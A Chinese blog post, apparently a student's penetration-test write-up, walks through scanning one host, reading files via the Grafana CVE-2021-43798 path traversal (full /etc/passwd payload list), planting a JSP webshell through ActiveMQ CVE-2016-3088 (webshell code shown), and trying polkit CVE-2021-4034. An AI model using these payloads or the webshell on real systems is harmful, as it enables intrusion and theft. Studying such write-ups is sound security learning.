前言
学习了一两个月的安全,为了对自己的一个学习水平做一个总结,所以我特地找来一个网站来进行一次渗透实战。
信息收集
这次的网站只有一个ip地址,但是发现直接访问这个ip地址返回的是连接超时无法访问
所以这时候就需要我们就得进行一个信息收集找到跟着ip有关的网站进行一个渗透测试。
通常信息收集的第一步是进行子域名收集,但由于本次我测试的网站直接就是一个真实ip,所以就直接从搜索这个ip是否有相关端口开发并进行利用。
通常进行端口扫描是使用nmap进行扫描,但我这里直接使用fofa进行资产收集
通过fofa搜集我发现了关于这个ip的端口开放了以下端口:3000、8888、8161、9200、8080、8001六个端口。
通过测试发现只有3000、8888、8161三个端口可以正常访问,所以我们就可以从这3个端口下手。
这三个端口访问内容如下
3000端口
8888端口
8161端口
搜集完他们的端口后我先使用dirsearch后台扫描工具对这三个网站进行一个扫描,看看是否有敏感文件。
扫描后发现8888端口有3个可疑敏感文件
扫描后发现3000端口有6个可疑敏感文件
扫描后发现8161端口有3个可疑敏感文件
扫描完后台后我们查看网页内容可以发现,3个网站分别是使用3个不同的中间件来搭建的网站,所以我们可以查看网站版本并上网查询此版本是否有漏洞可以利用。
百度后发现
3000端口的grafana网站下方版本为8.2.5所以极可能存在任意文件读取漏洞
通过输入错误文件目录我们发现可以获取8888端口的nginx的版本为1.21.5
百度后发现这版本没有什么漏洞
而端口8161的apache网站主页并未发现网站版本,但是有一个登陆界面,我们可能可以尝试使用字典爆破等方法尝试绕过。
漏洞验证
首先对上述后台扫描的文件进行一个测试发现
3000端口
都没有可以利用的文件,所以只能从相关版本漏洞来测试了。
通过测试8161端口只发现一个302跳转页面提示
发现暂时也没有可以利用的地方,所以只能尝试能否登陆进后台下手了。
通过测试8888端口发现www.root.7z这个压缩包下载下来后打开发现
这明显是一个base64的编码,所以我们需要对他进行一个解码
通过在这得到了一个账户和密码,我立马联想是否可以登录到apache的网站
输入后发现果然可以登录上apache网站
登录后发现告诉了我们apache的版本,所以我们可以去查找此版本的相关漏洞进行验证
通过百度发现此版本可能存在任意文件上传漏洞
漏洞攻击
grafana任意文件读取漏洞(cve-2021-43798)
一、漏洞描述
grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,grafana可以在网络浏览器里显示数据图表和警告。
二、漏洞影响范围
影响版本:
grafana 8.0.0 - 8.3.0
安全版本:
grafana 8.3.1, 8.2.7, 8.1.8, 8.0.7
payload:
/public/plugins/alertlist/../../../../../../../../../../../etc/passwd/public/plugins/annolist/../../../../../../../../../../../etc/passwd/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../../../../etc/passwd/public/plugins/barchart/../../../../../../../../../../../etc/passwd/public/plugins/bargauge/../../../../../../../../../../../etc/passwd/public/plugins/cloudwatch/../../../../../../../../../../../etc/passwd/public/plugins/dashlist/../../../../../../../../../../../etc/passwd/public/plugins/elasticsearch/../../../../../../../../../../../etc/passwd/public/plugins/gauge/../../../../../../../../../../../etc/passwd/public/plugins/geomap/../../../../../../../../../../../etc/passwd/public/plugins/gettingstarted/../../../../../../../../../../../etc/passwd/public/plugins/stackdriver/../../../../../../../../../../../etc/passwd/public/plugins/graph/../../../../../../../../../../../etc/passwd/public/plugins/graphite/../../../../../../../../../../../etc/passwd/public/plugins/heatmap/../../../../../../../../../../../etc/passwd/public/plugins/histogram/../../../../../../../../../../../etc/passwd/public/plugins/influxdb/../../../../../../../../../../../etc/passwd/public/plugins/jaeger/../../../../../../../../../../../etc/passwd/public/plugins/logs/../../../../../../../../../../../etc/passwd/public/plugins/loki/../../../../../../../../../../../etc/passwd/public/plugins/mssql/../../../../../../../../../../../etc/passwd/public/plugins/mysql/../../../../../../../../../../../etc/passwd/public/plugins/news/../../../../../../../../../../../etc/passwd/public/plugins/nodegraph/../../../../../../../../../../../etc/passwd/public/plugins/opentsdb/../../../../../../../../../../../etc/passwd/public/plugins/piechart/../../../../../../../../../../../etc/passwd/public/plugins/pluginlist/../../../../../../../../../../../etc/passwd/public/plugins/postgres/../../../../../../../../../../../etc/passwd/public/plugins/prometheus/../../../../../../../../../../../etc/passwd/public/plugins/stat/../../../../../../../../../../../etc/passwd/public/plugins/state-timeline/../../../../../../../../../../../etc/passwd/public/plugins/status-history/../../../../../../../../../../../etc/passwd/public/plugins/table/../../../../../../../../../../../etc/passwd/public/plugins/table-old/../../../../../../../../../../../etc/passwd/public/plugins/tempo/../../../../../../../../../../../etc/passwd/public/plugins/testdata/../../../../../../../../../../../etc/passwd/public/plugins/text/../../../../../../../../../../../etc/passwd/public/plugins/timeseries/../../../../../../../../../../../etc/passwd/public/plugins/welcome/../../../../../../../../../../../etc/passwd/public/plugins/zipkin/../../../../../../../../../../../etc/passwd 通过burpsuit抓包修改进行攻击
可以通过脚本来批量验证poc
最后发现flag
activemq 任意文件上传漏洞(cve-2016-3088)
一、漏洞描述
该漏洞出现在fileserver应用中,漏洞原理:activemq中的fileserver服务允许用户通过http put方法上传文件到指定目录。fileserver支持写入文件(不解析jsp),但是支持移动文件(move)我们可以将jsp的文件put到fileserver下,然后再通过move指令移动到可执行目录下访问。
二、漏洞影响范围
apache activemq 5.0.0 - 5.13.2
三、漏洞利用:
文件写入有几种利用方法:
1.写入webshell
2.写入cron 或ssh key 等文件
3.写入jar 或 jetty.xml 等库和配置文件
写入webshell的好处是门槛低,方便,但是fileserver不解析jsp,admin和api两个应用都需要登录才能访问,所以有点鸡肋,写入cron 和ssh key 好处是直接反弹拿shell,也比较方便,缺点是需要root权限,写入jar,稍微麻烦点(需要jar后门 ),写入xml配置文件,这个方法比较靠谱,但有个鸡肋点是,我们需要activemq的绝对路径。
写入webshell
exp:
class u extends classloader{u(classloader c){super(c);}public class g(byte []b){return super.defineclass(b,0,b.length);}}string k=e45e329feb5d925b;session.putvalue(u,k);cipher c=cipher.getinstance(aes);c.init(2,new secretkeyspec((session.getvalue(u)+).getbytes(),aes));new u(this.getclass().getclassloader()).g(c.dofinal(new sun.misc.base64decoder().decodebuffer(request.getreader().readline()))).newinstance().equals(pagecontext); 写入webshell需要写在admin或api应用中,而这俩应用都需要登录才能访问。我们之前已经登录过了,访问admin/test/systemproperties.jsp可以查看activemq的绝对路径
然后通过burpsuit抓包构造put请求,当返回204状态码则说明文件上传成功
访问fileserver/shell.jsp则会将我们写入的shell展示出来,如下图所示
move请求,将该文件移动到/admin/中,让脚本进行解析,显示204说明上传成功
上传完后通过burpsuit抓取一下get包请求头
使用冰蝎进行webshell连接
连接后通过ls命令查看了当前目录文件,可以发现目录下有cve-2021-4034的相关文件,通过whoami和id命令发现只有user权限没有root权限
通过百度发现cve-2021-4034是一个权限提升的漏洞,所以我们可以尝试通过这个漏洞进行一个权限提升。
权限提升
cve-2021-4034 linux polkit 提权漏洞
一、漏洞描述
polkit 在系统层级进行权限控制,提供了一个低优先级进程和高优先级进程进行通讯的系统。和 sudo 等程序不同,polkit 并没有赋予进程完全的 root 权限,而是通过一个集中的策略系统进行更精细的授权。
二、影响版本
目前在cve官网上没有列举详细的影响版本范围,升级到最新版本即可。当前最新版本 polkit-0.112-26.el7_9.1
三、漏洞利用
1.下载exp,地址:https://github.com/berdav/cve-2021-4034
2.在下载的文件夹直接make编译
3.执行./cve-2021-4034
4.提权成功
成功效果图
但是我在使用的冰蝎时发现目录中的exp不完整,无法进行一个漏洞利用,而且gcc命令未安装,但是安装相关命令需要root权限,所以导致没法提升至root权限。暂时还没找到其他方法进行权限提升,若后续找到方法会重新更新。
总结
通过这一次渗透测试的实战经历,让我对自己的信息收集和漏洞利用方面的思路得到了提升,但在权限提升,内网渗透方面学习的比较浅,还需要继续学习。
参考文献
activemq 任意文件上传漏洞(cve-2016-3088)-https://blog.csdn.net/weixin_45146120/article/details/106592766
cve-2021-4034 linux polkit 提权漏洞复现与修复 -https://blog.csdn.net/travelnight/article/details/123640942
grafana任意文件读取漏洞(cve-2021-43798) -https://blog.csdn.net/weixin_44522540/article/details/122236791
低功耗蓝牙温湿度传感器常用的场景有哪些
干簧继电器验证测试
手机即老婆,选对了用着才顺手
虚拟机:Ubuntu的基本配置
灵感家:最具价值创意产品孵化平台
一次详细的渗透测试实战案例解析
怎么做好LED透明屏的防火措施
EE型铁氧体磁芯参数,EE CORE
变频器缺相的原因分析
百度Apollo开放四大关键能力 发布《百度智能驾驶开放白皮书》
智能扫地机器人设计方案
使用声发射的方法检验贮罐底板
ZigBee智能餐厅定位系统
今年半导体资本支出同比再增加 三星居榜首
硅片射频和分子量控制产品
MRAM非易失性存储器MR10Q010概述及特征
全球首例!全球工业无人机市场将正式进入5G商用时代
解决时延难题方面,FPGA发挥的三大关键作用
导热界面材料解决充电器电源散热问题
Gartner:2020年全球公共云收入将增长17%